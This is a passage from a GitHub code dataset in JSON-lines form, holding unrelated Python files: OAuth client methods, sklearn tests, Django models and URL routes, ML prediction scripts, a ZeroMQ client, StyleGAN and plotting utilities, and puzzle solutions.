verify=False)\r\n\r\n\r\n def get_authorization_code_uri(self, **params):\r\n \"\"\"Construct a full URL that can be used to obtain an authorization\r\n code from the provider authorization_uri. Use this URI in a client\r\n frame to cause the provider to generate an authorization code.\r\n\r\n :rtype: str\r\n \"\"\"\r\n if 'response_type' not in params:\r\n params['response_type'] = self.default_response_type\r\n params.update({'client_id': self.client_id,\r\n 'redirect_uri': self.redirect_uri})\r\n return utils.build_url(self.authorization_uri, params)\r\n\r\n def get_token(self, **params):\r\n \"\"\"Get an access token from the provider token URI.\r\n\r\n :param code: Authorization code.\r\n :type code: str\r\n :return: Dict containing access token, refresh token, etc.\r\n :rtype: dict\r\n \"\"\"\r\n if 'grant_type' not in params:\r\n params['grant_type'] = self.default_grant_type\r\n params.update({'client_id': self.client_id,\r\n 'client_secret': self.client_secret})\r\n if params['grant_type'] != 'refresh_token':\r\n params['redirect_uri'] = self.redirect_uri\r\n response = self.http_post(self.token_uri, params)\r\n try:\r\n return response.json()\r\n except TypeError:\r\n return response.json\r\n\r\n","repo_name":"zouyapeng/BBS","sub_path":"apps/account/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"20051223403","text":"import numpy as np\n\nfrom sklearn.utils.testing import (assert_equal, assert_array_equal,\n assert_array_almost_equal,\n assert_almost_equal)\nfrom sklearn.metrics import log_loss, roc_auc_score\n\nfrom wolpert.wrappers.base import _scores\n\nRANDOM_STATE = 498595\n\n\ndef test_scores():\n np.random.seed(RANDOM_STATE)\n ytrue = np.random.randint(2, size=10)\n ypreds = np.random.rand(10)\n\n # check that it works with a single predefined score\n logloss = _scores(ytrue, ypreds, 'log_loss')['score']\n assert_almost_equal(logloss, 1.2694, decimal=4)\n\n # check that works with metric\n logloss = _scores(ytrue, ypreds, log_loss)['score']\n assert_almost_equal(logloss, 1.2694, decimal=4)\n\n # check that it works with list\n scores = _scores(ytrue, ypreds, ('log_loss', roc_auc_score))\n assert_array_equal([\"score\", \"score1\"], list(scores.keys()))\n assert_array_almost_equal([1.2694, 0.24], list(scores.values()),\n decimal=4)\n\n # check that it works with dict\n scores = _scores(ytrue, ypreds, {\"logloss\": 'log_loss',\n \"roc_auc\": roc_auc_score})\n assert_array_equal([\"logloss\", \"roc_auc\"], list(scores.keys()))\n assert_array_almost_equal([1.2694, 0.24], list(scores.values()),\n decimal=4)\n","repo_name":"caioaao/wolpert","sub_path":"wolpert/wrappers/tests/base_test.py","file_name":"base_test.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"43"} +{"seq_id":"22607471191","text":"from django.db import models\n\nfrom mycomm.models.department import Department\nfrom mycomm.models.group import Group\nfrom mycomm.models.user import User\n\n\nclass Board(models.Model):\n name = models.CharField(\n verbose_name='게시판 이름',\n max_length=255,\n null=False,\n blank=False\n )\n is_hidden = models.BooleanField(\n verbose_name='익명 여부',\n null=False,\n default=False\n )\n\n department = models.ForeignKey(\n verbose_name='학과',\n to=Department,\n on_delete=models.CASCADE,\n null=False,\n related_name='department_board'\n )\n group = models.ForeignKey(\n verbose_name='그룹',\n to=Group,\n on_delete=models.CASCADE,\n null=True,\n related_name='group_board'\n )\n managers = models.ManyToManyField(\n verbose_name='관리자 명단',\n to=User,\n null=False,\n related_name='manager_board'\n )\n","repo_name":"Moong-glE/my-community-backend","sub_path":"mycomm/models/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"75398114370","text":"from dateutil.relativedelta import relativedelta\nimport datetime\nfrom tqdm import tqdm\nimport xgboost as xgb\nimport sqlite3\nimport pandas as pd\nimport numpy as np\nfrom pathlib import Path\n\n\ndef dbPath()-> Path:\n cwd = Path.cwd()\n dc2 = cwd.parent\n db= dc2.joinpath(\"data/database_final.db\")\n return db\n\ndef modelPath(lsoaCode:str) -> Path:\n cwd = Path.cwd()\n dc2 = cwd.parent\n modelPath = dc2.joinpath(f\"data/models/{lsoaCode}.bin\")\n return modelPath\n\n\ndef makeAllFeatures():\n conn = sqlite3.connect(dbPath())\n query_lsoa_codes = \"\"\"\n SELECT geogcode\n FROM lsoa_code_to_name\n \"\"\"\n lsoa_codes = pd.read_sql(query_lsoa_codes, conn)\n\n query_unemployement = \"\"\"\n SELECT * \n FROM montly_unemployement_claimant_count_by_lsoa_barnet\n \"\"\"\n unemployement = pd.read_sql(query_unemployement, conn)\n\n unemployement.dropna(inplace=True)\n unemployement.drop(columns=\"index\", inplace=True)\n unemployement = unemployement[(unemployement[\"date\"]<\"2020\") & (unemployement[\"date\"]>\"2012\")]\n\n unemployement = unemployement[unemployement[\"geogcode\"]!=\"Column Total\"].copy()\n lsoa_code_list = lsoa_codes[lsoa_codes[\"geogcode\"] != \"Column Total\"][\"geogcode\"].to_list()\n allFeatures = pd.DataFrame(columns=lsoa_code_list, index=pd.to_datetime(unemployement[\"date\"].unique()))\n\n for row in unemployement.index:\n allFeatures[unemployement[\"geogcode\"][row]][unemployement[\"date\"][row]] = unemployement[\"value\"][row]\n \n shiftColumnList = []\n for code in lsoa_code_list:\n tempDF = pd.DataFrame(columns=[f\"{code}_shift_{i+1}\" for i in range(12)])\n for i in range(12):\n tempDF[f\"{code}_shift_{i+1}\"] = allFeatures[code].shift(i+1)\n shiftColumnList.append(tempDF.copy())\n allShifts = pd.concat(shiftColumnList, axis=1)\n allFeatures = pd.concat([allFeatures, allShifts], axis=1)\n allFeatures = allFeatures.dropna()\n conn.close()\n return allFeatures, lsoa_code_list\n\n\ndef main():\n print(\"LOADING UNEMPLOYEMENT\")\n allFeatures, lsoa_code_list = makeAllFeatures()\n print(\"UNEMPLOYEMENT LOADED\")\n lastRow = allFeatures.tail(1)\n present = pd.to_datetime(list(lastRow.index)[0])\n # print(present)\n lastArrArr = lastRow.to_numpy()\n lastArr = lastArrArr[0].T\n # names = lastRow.columns\n # print(lastArr[:].shape)\n pred = {\"LSOA\": lsoa_code_list}\n for i in tqdm(range(12)):\n tempGuess = np.empty(len(lsoa_code_list))\n for j, code in enumerate(lsoa_code_list):\n model = xgb.XGBRegressor()\n model.load_model(modelPath(code))\n X = lastArr[:-211].reshape(1,-1).copy()\n guess = model.predict(X)\n tempGuess[j] = guess[0]\n pred[pd.to_datetime(present+relativedelta(months=i+1))] = tempGuess\n last_arr_slice = lastArr[:-211].copy()\n lastArr = np.concatenate([tempGuess, last_arr_slice])\n\n\n return pd.DataFrame(pred)\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DC2-G19/policeResourceAllocation","sub_path":"predicting_unemployement.py","file_name":"predicting_unemployement.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71919137089","text":"# Name: Alyson Matheus Maruyama Nascimento -8532269\n\nimport numpy as np\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn import datasets\nfrom sklearn import svm\n\n# Reading IRIS dataset from sklearn\ndataset = datasets.load_iris()\n\nX = dataset.data[:, :-1]\ny = dataset.target\n\n# Holdout method: simply splits the dataset into Train/Test, \n# using the Train subset to train the model and the test susbset to validate it\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4)\n\n# First classifier: MLP\nmlp1 = MLPClassifier(solver='sgd', alpha=1e-5, hidden_layer_sizes=(5, 3, 3), activation='logistic', learning_rate='constant', learning_rate_init=0.002)\nmlp1.fit(X_train, y_train)\nmlp1_predicted = mlp1.predict(X_test)\nprint('\\n- MLP1 Accuracy:', metrics.accuracy_score(y_test, mlp1_predicted))\nprint('\\n- MLP1 Confusion Matrix:\\n', metrics.confusion_matrix(y_test, mlp1_predicted))\nprint('\\n- MLP1 Classification Report\\n', metrics.classification_report(y_test, mlp1_predicted))\nprint('\\n- MLP1 Absolute Error\\n', metrics.max_error(y_test, mlp1_predicted))\n\n# Second classifier using the same technique (Holdout)\nsvm1 = svm.SVC(kernel='linear')\nsvm1.fit(X_train, y_train)\nsvm1_predicted = svm1.predict(X_test)\nprint('\\n- SVM1 Accuracy:', metrics.accuracy_score(y_test, svm1_predicted))\nprint('\\n- SVM1 Confusion Matrix:\\n', metrics.confusion_matrix(y_test, svm1_predicted))\nprint('\\n- SVM1 Classification Report\\n', metrics.classification_report(y_test, svm1_predicted))\nprint('\\n- SVM1 Absolute Error\\n', metrics.max_error(y_test, mlp1_predicted))\n","repo_name":"alyson1907/RedesNeurais","sub_path":"trabalho-avaliativo/trab1.py","file_name":"trab1.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15733574309","text":"import copy\nanswer = 0\n\n\n# 현재 노드, 자식 제외 갈 수 있는 곳, 양, 늑대\ndef dfs(tree, info, node, can_go, sheep, wolves):\n global answer\n answer = max(answer, sheep)\n new_can_go = copy.deepcopy(can_go)\n\n # 자식 노드가 1개인 경우\n if len(tree[node]) == 1:\n child = tree[node][0]\n if info[child] == 0:\n dfs(tree, info, child, new_can_go, sheep + 1, wolves)\n else:\n if sheep > wolves + 1:\n dfs(tree, info, child, new_can_go, sheep, wolves + 1)\n \n # 자식 노드가 2개인 경우\n if len(tree[node]) == 2:\n for i in range(2):\n child = tree[node][i]\n if info[child] == 0:\n dfs(tree, info, child, new_can_go + [tree[node][(i + 1) % 2]], sheep + 1, wolves)\n else:\n if sheep > wolves + 1:\n dfs(tree, info, child, new_can_go + [tree[node][(i + 1) % 2]], sheep, wolves + 1)\n\n # 자식이 아닌 노드로도 갈 수 있다.\n for x in can_go:\n if info[x] == 0:\n new_can_go.remove(x)\n dfs(tree, info, x, new_can_go + tree[node], sheep + 1, wolves)\n new_can_go.append(x)\n else:\n if sheep > wolves + 1:\n new_can_go.remove(x)\n dfs(tree, info, x, new_can_go + tree[node], sheep, wolves + 1)\n new_can_go.append(x)\n\n\ndef solution(info, edges):\n global answer\n answer = 0\n graph = [[] for _ in range(len(info))]\n\n for parent, child in edges:\n graph[parent].append(child)\n\n dfs(graph, info, 0, [], 1, 0)\n\n return answer\n","repo_name":"socar-abel/Problem_Solving","sub_path":"프로그래머스/Level3/양과 늑대 2트(정답).py","file_name":"양과 늑대 2트(정답).py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"43"} +{"seq_id":"7499414286","text":"from functools import wraps\n\nfrom whovedonethis.loggedinuser import LoggedInUser\n\ndef add_created_user(f):\n '''\n Decorate pre_save signal for adding created user\n '''\n @wraps(f)\n def wrapper(sender, instance, **kwargs):\n if not instance.id:\n created_by_attr = getattr(instance, \"created_by_field\",\n \"created_by\"\n )\n setattr(instance, created_by_attr, LoggedInUser().current_user)\n return f(sender, instance, **kwargs)\n return wrapper\n\ndef add_updated_user(f):\n '''\n Decorate pre_save signal for adding created user\n '''\n @wraps(f)\n def wrapper(sender, instance, **kwargs):\n updated_by_attr = getattr(instance, \"updated_by_field\",\n \"updated_by\"\n )\n setattr(instance, updated_by_attr, LoggedInUser().current_user)\n return f(sender, instance, **kwargs)\n return wrapper\n \nadd_created_and_updated_user = lambda x: add_created_user(add_updated_user(x))\nadd_created_and_updated_user.__doc__ =\\\n '''\n Decorate pre_save signal for adding created user\n '''\n","repo_name":"Zapix/whovedonethis","sub_path":"whovedonethis/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"39814968098","text":"import zmq\nimport random\nimport logging\nimport sys\nimport os\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n\naddress = os.environ[\"ZMQ_ADDRESS\"]\ncontext = zmq.Context()\n\nlogging.info(\"Connecting to server...\")\nsocket = context.socket(zmq.REQ)\nsocket.connect(address)\nclient_id = random.randrange(1, 10005)\n\nfor request in range(1, 1000):\n logging.info(\"Sending request {}\".format(request))\n socket.send_string(\"PING {} from client {}\".format(request, client_id))\n # Get the reply\n message = socket.recv()\n logging.info(\"Received reply {}: '{}'\".format(request, str(message)))\n","repo_name":"schocco/zmq-docker-compose-example","sub_path":"client/queue_client.py","file_name":"queue_client.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"43"} +{"seq_id":"2826599142","text":"\"\"\"FIRMonitoringSystem URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\n\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('fir/', include('fir.urls')),\n path('firBeta/', include('firBeta.urls')),\n path('fault//', views.fault, name='fault'),\n path('success//', views.success, name='success'),\n path('send_mails_for_the_day/', views.send_mails_for_the_day, name='send_mails_for_the_day'),\n # path('populate/', views.populate, name='populate'),\n # path('delete/', views.delete, name='delete'),\n # path('change_passwords/', views.change_passwords, name='change_passwords'),\n path('admin/', admin.site.urls),\n path('account/', include('account.urls')),\n]\n","repo_name":"adityakumar2809/FIRtrackingsystem","sub_path":"FIRMonitoringSystem/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"32508395393","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\nfrom MyChronoGPS_WebPaths import Paths\nPath = Paths();\nautotrack = Path.pathdata+\"/tracks/Autotrack.trk\"\n\nimport glob \nimport os\nimport json\nimport cgi\n\n# mydict représente le retour de la fonction ajax\nmydict = dict()\n\nif os.path.isfile(autotrack):\n try:\n os.remove(autotrack)\n mydict[\"msg\"] = \"autodef track successfully removed\"\n mydict[\"return\"] = 0\n except OSError as err:\n print(\"OS error: {0}\".format(err))\n mydict[\"msg\"] = \"OS error: {0}\".format(err)\n mydict[\"return\"] = 8\n except:\n print(\"Unexpected error:\", sys.exc_info()[0], sys.exc_info()[1])\n mydict[\"msg\"] = \"Unexpected error:\", sys.exc_info()[0], sys.exc_info()[1]\n raise\nelse:\n mydict[\"msg\"] = \"no autodef track to remove\"\n mydict[\"return\"] = 0\n\nprint(\"Content-Type:application/json; charset=UTF-8\\n\")\n\nprint(json.dumps(mydict))","repo_name":"jfk93-fr/MyChronoGPS","sub_path":"Web-Pi/ajax/clear_autodef.py","file_name":"clear_autodef.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20582226590","text":"import os\nimport sys\n\nsys.path.insert(0, '../')\nsys.path.insert(0, '../LES_Solvers/')\nsys.path.insert(0, '../LES_Solvers/testcases/HIT_2D/')\n\nfrom LES_constants import *\nfrom LES_parameters import *\nfrom LES_plot import *\nfrom HIT_2D import L\n\nfrom MSG_StyleGAN_tf2 import *\n\n\n# local parameters\nNIP = 5 # number of interpolation points \nUMIN = -0.5\nUMAX = 0.5\nVMIN = -0.5\nVMAX = 0.5\nPMIN = -1.0\nPMAX = 1.0\nCMIN = 0.0\nCMAX = 1.0\nWMIN = -0.25\nWMAX = 0.25\n\n\n# clean up\nos.system(\"rm -rf plots\")\nos.system(\"rm -rf uvw\")\nos.system(\"rm -rf energy\")\nos.system(\"mkdir plots\")\nos.system(\"mkdir uvw\")\nos.system(\"mkdir energy\")\n\n\ndir_log = 'logs/'\ntf.random.set_seed(1)\niOUTDIM22 = one/(2*OUTPUT_DIM*OUTPUT_DIM) # 2 because we sum U and V residuals \nP_DNS_t = np.zeros([OUTPUT_DIM, OUTPUT_DIM])\nC_DNS_t = np.zeros([OUTPUT_DIM, OUTPUT_DIM])\n\n\n# loading StyleGAN checkpoint and filter\ncheckpoint.restore(managerCheckpoint.latest_checkpoint)\n\n\n# create variable synthesis model\nlatents = tf.keras.Input(shape=[G_LAYERS, LATENT_SIZE])\nwlatents = layer_wlatent(latents)\ndlatents = wlatents(latents)\noutputs = synthesis(dlatents, training=False)\nwl_synthesis = tf.keras.Model(latents, outputs)\nwl_synthesis2 = tf.keras.Model(latents, outputs)\nwl_synthesis3 = tf.keras.Model(latents, outputs)\n\n# loading StyleGAN checkpoint and filter\nmanagerCheckpoint = tf.train.CheckpointManager(checkpoint, '../' + CHKP_DIR, max_to_keep=2)\nmanagerCheckpoint_wl = tf.train.CheckpointManager(checkpoint_wl, '../' + CHKP_DIR_WL, max_to_keep=2)\ncheckpoint_wl.restore(managerCheckpoint_wl.latest_checkpoint)\n\ncheckpoint_wl2 = tf.train.Checkpoint(wl_synthesis2=wl_synthesis)\nmanagerCheckpoint_wl2 = tf.train.CheckpointManager(checkpoint_wl2, '../' + CHKP_DIR_WL, max_to_keep=2)\ncheckpoint_wl2.restore(managerCheckpoint_wl.latest_checkpoint)\n\n\n\n\n@tf.function\ndef find_step(latent, clatents):\n wl_synthesis.trainable_variables[st].assign(clatents)\n predictions = wl_synthesis3(latent, training=False)\n UVW_DNS = predictions[RES_LOG2-2]\n\n return UVW_DNS\n\n\n\n# Change style as interpolation between the 2 wlatent space\nzlatent = tf.random.uniform([1, LATENT_SIZE])\ndlatents = mapping(zlatent, training=False)\n\nfor st in range(1,len(wl_synthesis.trainable_variables)):\n rand0 = wl_synthesis.trainable_variables[st]\n rand1 = wl_synthesis2.trainable_variables[st]\n closePlot = False\n for i in range(NIP):\n if (i==NIP):\n clatents = tf.convert_to_tensor(rand0)\n UVW_DNS = find_step(dlatents, clatents)\n else:\n clatents = tf.convert_to_tensor((1.-i/float(NIP-1))*rand0 + i/float(NIP-1)*rand1) \n\n # if (st==0):\n # nwlatents = tf.concat([clatents, wl_synthesis.trainable_variables[st+1:G_LAYERS]], 0)\n # elif (st==G_LAYERS-1):\n # nwlatents = tf.concat([wl_synthesis.trainable_variables[0:st], clatents], 0)\n # else:\n # nwlatents = tf.concat([wl_synthesis.trainable_variables[0:st], clatents, wl_synthesis.trainable_variables[st+1:G_LAYERS]], 0)\n\n UVW_DNS = find_step(dlatents, clatents)\n\n U_DNS_t = UVW_DNS[0, 0, :, :].numpy()\n V_DNS_t = UVW_DNS[0, 1, :, :].numpy()\n W_DNS_t = UVW_DNS[0, 2, :, :].numpy()\n\n filename = \"plots/plots_sty_\" + str(st) + \"_lev_\" + str(i) + \".png\"\n print_fields(U_DNS_t, V_DNS_t, P_DNS_t, W_DNS_t, OUTPUT_DIM, filename)\n # Umin=UMIN, Umax=UMAX, Vmin=VMIN, Vmax=VMAX, Pmin=PMIN, Pmax=PMAX, Wmin=WMIN, Wmax=WMAX)\n\n filename = \"energy/energy_spectrum_sty_\" + str(st) + \"_lev_\" + str(i) + \".txt\"\n if (i == NIP-1):\n closePlot=True\n plot_spectrum(U_DNS_t, V_DNS_t, L, filename, closePlot)\n\n print(\"done for style \" + str(st) + \" i \" + str(i))\n\n","repo_name":"stfc/StylES","sub_path":"utilities/check_noises.py","file_name":"check_noises.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10640096964","text":"# -*- coding: utf-8 -*-\nfrom platinumegg.app.cabaret.util.url_maker import UrlMaker\nfrom platinumegg.app.cabaret.views.application.battleevent.base import BattleEventBaseHandler\nfrom platinumegg.app.cabaret.util.api import BackendApi\nimport settings\nfrom defines import Defines\n\nclass Handler(BattleEventBaseHandler):\n \"\"\"バトルイベントログインボーナス演出.\n \"\"\"\n \n @classmethod\n def getViewerPlayerClassList(cls):\n return []\n \n def process(self):\n \n args = self.getUrlArgs('/battleeventloginbonusanim/')\n eventid = args.getInt(0)\n# fame = args.getInt(1)\n# fame_next = args.getInt(2)\n rank = args.getInt(3)\n rank_next = args.getInt(4)\n grouprank = args.getInt(5)\n \n model_mgr = self.getModelMgr()\n \n eventmaster = None\n if eventid and rank and rank_next:\n eventmaster = BackendApi.get_battleevent_master(model_mgr, eventid, using=settings.DB_READONLY)\n if eventmaster is None or eventmaster.is_goukon:\n url = self.makeAppLinkUrlRedirect(UrlMaker.mypage())\n self.appRedirect(url)\n return\n \n # 最大ランクのマスター.\n max_rankmaster = BackendApi.get_battleevent_maxrankmaster(model_mgr, eventid, using=settings.DB_READONLY)\n \n # ランクマスターデータ.\n master_dict = BackendApi.get_battleevent_rankmaster_dict(model_mgr, eventid, list(set([rank, rank_next])), using=settings.DB_READONLY)\n if master_dict.get(rank) is None or master_dict.get(rank_next) is None:\n url = self.makeAppLinkUrlRedirect(UrlMaker.mypage())\n self.appRedirect(url)\n return\n \n if rank < rank_next:\n # ランクアップ.\n effectText0 = Defines.EffectTextFormat.BATTLEEVENT_LOGINBONUS_UP % (master_dict[rank].name, grouprank, master_dict[rank_next].name)\n elif rank == rank_next:\n # ランクステイ.\n effectText0 = Defines.EffectTextFormat.BATTLEEVENT_LOGINBONUS_STAY % (master_dict[rank].name, grouprank, master_dict[rank_next].name)\n else:\n # ランクダウン.\n effectText0 = Defines.EffectTextFormat.BATTLEEVENT_LOGINBONUS_DOWN % (master_dict[rank].name, grouprank, master_dict[rank_next].name)\n \n if max_rankmaster and max_rankmaster.rank == rank_next:\n effectText1 = Defines.EffectTextFormat.BATTLEEVENT_LOGINBONUS_2_RANKMAX\n else:\n effectText1 = Defines.EffectTextFormat.BATTLEEVENT_LOGINBONUS_2\n \n params = {\n 'effectText0' : effectText0,\n 'effectText1' : effectText1,\n 'backUrl' : self.makeAppLinkUrl(UrlMaker.mypage()),\n 'pre' : self.url_static_img + 'event/btevent/%s/' % eventmaster.codename,\n 'logo_img' : 'scenario/event_logo.png',\n 'logo_w_img' : 'scenario/event_logo_w.png',\n }\n self.appRedirectToEffect('btevent/event_result/effect.html', params)\n\ndef main(request):\n return Handler.run(request)\n","repo_name":"hitandaway100/caba","sub_path":"src/dprj/platinumegg/app/cabaret/views/application/battleevent/loginbonusanim.py","file_name":"loginbonusanim.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"309969639","text":"class Solution:\n def searchRange(self, nums: List[int], target: int) -> List[int]:\n j = len(nums)-1\n aux = []\n i=0\n return_null = [-1,-1]\n control = 1\n while control==1:\n if nums[i] == target:\n aux.append(i)\n control = 0\n i = i+1\n control = 1\n if len(aux) == 0:\n return return_null\n while control==1:\n if nums[j] == target:\n aux.append(j)\n control = 0\n j = j-1\n return aux\n","repo_name":"marlusmarcos/Estrutura-de-Dados","sub_path":"prova/find_first_and_last.py","file_name":"find_first_and_last.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7406442586","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\n\nIx = open('FinalProjectData.txt', 'r').read().split()\nvgs =[]\ni1 = []\ni2 = []\ni3 = []\ni4 = []\ni5 = []\n\nvgs2 =[]\ni12 = []\ni22 = []\ni32 = []\ni42 = []\ni52 = []\n\ni1_theo = []\ni2_theo = []\ni3_theo = []\ni4_theo = []\n\ncount = 0\nfor line in Ix:\n if \"v2\" in line:\n pass\n else:\n if count == 0:\n vgs.append(float(line))\n elif count == 2:\n i1.append(float(line))\n elif count == 3:\n i2.append(float(line))\n elif count == 4:\n i3.append(float(line))\n elif count == 5:\n i4.append(float(line))\n elif count == 6:\n i5.append(float(line))\n count = -1\n count += 1\n\nfor i, v in enumerate(vgs):\n if i%6==0:\n vgs2.append(v)\n i12.append(i1[i])\n i22.append(i2[i])\n i32.append(i3[i])\n i42.append(i4[i])\n i52.append(i5[i])\n\nfor i, val in enumerate(i52):\n print(val/i1[1])\n i1_theo.append(16*val)\n i2_theo.append(8*val)\n i3_theo.append(4*val)\n i4_theo.append(2*val)\n\n#print(i1_theo)\n\nif __name__ == '__main__':\n title = \"Plot of Current Vs Gate Voltage in Ladder Network\"\n xLabel = \"Vg (V)\"\n yLabel = \"I (A)\"\n\n Data = plt.plot(vgs2, i12, 'bo', markersize=3, label=\"I1\")\n # Data = plt.plot(vgs2, i22, 'ro', markersize=3, label=\"I2\")\n # Data = plt.plot(vgs2, i32, 'go', markersize=3, label=\"I3\")\n # Data = plt.plot(vgs2, i42, 'ko', markersize=3, label=\"I4\")\n # Data = plt.plot(vgs2, i52, 'co', markersize=3, label=\"I5\")\n\n Data = plt.plot(vgs2, i1_theo, 'r*', markersize=3, label=\"I1 theoretical\")\n # Data = plt.plot(vgs2, i2_theo, 'g*', markersize=3, label=\"I2 theoretical\")\n # Data = plt.plot(vgs2, i3_theo, 'k*', markersize=3, label=\"I3 theoretical\")\n # Data = plt.plot(vgs2, i4_theo, 'c*', markersize=3, label=\"I4 theoretical\")\n\n\n plt.legend()\n plt.xlabel(xLabel)\n plt.ylabel(yLabel)\n plt.title(title)\n plt.grid(True)\n plt.savefig('currents.png', format='png')\n plt.show()\n","repo_name":"vickymmcd/circuits-sp19","sub_path":"Final Project/currents.py","file_name":"currents.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22685618291","text":"# setup: pip3 install scikit-image\nfrom skimage import io, draw\nfrom PIL import Image, ImageDraw, ImageFont\nimport numpy as np\n\n# read hospitalizations per day from datafile\nPOINTS = list(map(int, open('hospitalized.txt').readlines()))\n\n\nclass Plot:\n def __init__(self, img, start_x, start_y, title=None):\n self.img = img\n self.start_x = start_x\n self.start_y = start_y\n self.title = title\n\n\nclass Prediction:\n def __init__(self, path, x_size, y_size):\n self.path = path\n self.img = io.imread(self.path)\n self.x_size = float(x_size)\n self.y_size = float(y_size)\n self.points = list(map(int, open('hospitalized.txt').readlines()))\n\n def process(self, *search_xy):\n # Scan y axis.\n y_axis = self.scan(search_xy, lambda x, y: (x, y-1))\n y_start = y_axis[0][1]\n y_end = y_axis[-1][1]\n\n # Scan x axis.\n x_axis = self.scan(search_xy, lambda x, y: (x+1, y))\n x_start = x_axis[0][0]\n x_end = x_axis[-1][0]\n\n # Calculate pixels on axis.\n y_pixels = abs(y_start - y_end)\n x_pixels = abs(x_start - x_end)\n\n # Calculate pixel height and width of units.\n y_point_width = y_pixels / self.y_size\n x_point_width = x_pixels / self.x_size\n\n # Draw the plot.\n self.plot(\n self.points,\n start_x=x_start, start_y=y_start,\n x_point_width=x_point_width, y_point_width=y_point_width)\n\n # Cut the image to fit the plot.\n crop_start_x = x_start\n crop_start_y = y_start - y_pixels\n crop_end_x = x_start + x_pixels\n crop_end_y = y_start\n\n def fix(f, nxt):\n count = 0\n while count < 15:\n count += 1\n line, nxt = f(nxt)\n if any(p[0] < 250 for p in line):\n count = 0\n return nxt\n\n for _ in range(1):\n crop_start_y = fix(lambda y: (self.img[y, crop_start_x:crop_end_x], y - 1), crop_start_y)\n crop_end_y = fix(lambda y: (self.img[y, crop_start_x:crop_end_x], y + 1), crop_end_y)\n crop_start_x = fix(lambda x: (self.img[crop_start_y:crop_end_y, x], x - 1), crop_start_x)\n #crop_end_x = fix(lambda x: (self.img[crop_start_y:crop_end_y, x], x + 1), crop_end_x)\n\n return Plot(self.img[crop_start_y:crop_end_y, crop_start_x:crop_end_x],\n x_start - crop_start_x,\n y_start - crop_start_y)\n\n\n def save(self):\n io.imsave('test.png', self.img)\n\n def valid(self, x, y):\n return 0 <= x < len(self.img[0]) and 0 <= y < len(self.img)\n\n def scan(self, search_xy, step):\n def white(xy):\n x, y = xy\n return (x, y), self.img[y, x][0] >= 200 and step(x, y) if self.valid(x, y) else None\n\n def nonwhite(xy):\n x, y = xy\n return (x, y), self.img[y, x][0] < 200 and step(x, y) if self.valid(x, y) else None\n\n lines = []\n\n start = self.replicate(white, search_xy)[-1]\n block = self.replicate(nonwhite, start)\n\n first = None\n second = None\n\n while block:\n lines.append(block[0])\n startline = self.replicate(white, block[-1])\n\n l = len(startline)\n if not first:\n first = l\n elif first and not second:\n second = l\n elif second and abs(l - second) / second > .1:\n break\n\n block = self.replicate(nonwhite, startline[-1])\n\n return lines\n\n\n def replicate(self, f, nxt):\n results = []\n while nxt:\n v, nxt = f(nxt)\n results.append(v)\n return results\n\n def plot(self, points, start_x, start_y, x_point_width, y_point_width):\n def add_line(img, x0, y0, x1, y1):\n cc, rr, val = draw.line_aa(int(y0), int(x0), int(y1), int(x1))\n img[cc, rr] = (0, 0, 255, 255)\n\n prev_x = start_x\n prev_y = start_y\n for x, p in enumerate(points):\n new_x = start_x + x * x_point_width\n new_y = start_y - p * y_point_width\n add_line(self.img, prev_x, prev_y, new_x, new_y)\n prev_x = new_x\n prev_y = new_y\n\n\ndef merge_vertical(*imgs):\n # Warning: this is a bit rough.\n # Calculate the left margin width, i.e. pixels from left to right before we hit something black.\n left = []\n for i in imgs:\n xs = [0]\n for x in range(len(i[0])):\n white = all(p[0] >= 250 for p in i[0:len(i), x])\n if not white:\n break\n xs.append(x)\n left.append(xs[-1])\n\n # Final image size will fit largest sub-image.\n max_width = max(l + len(i[0]) for l, i in 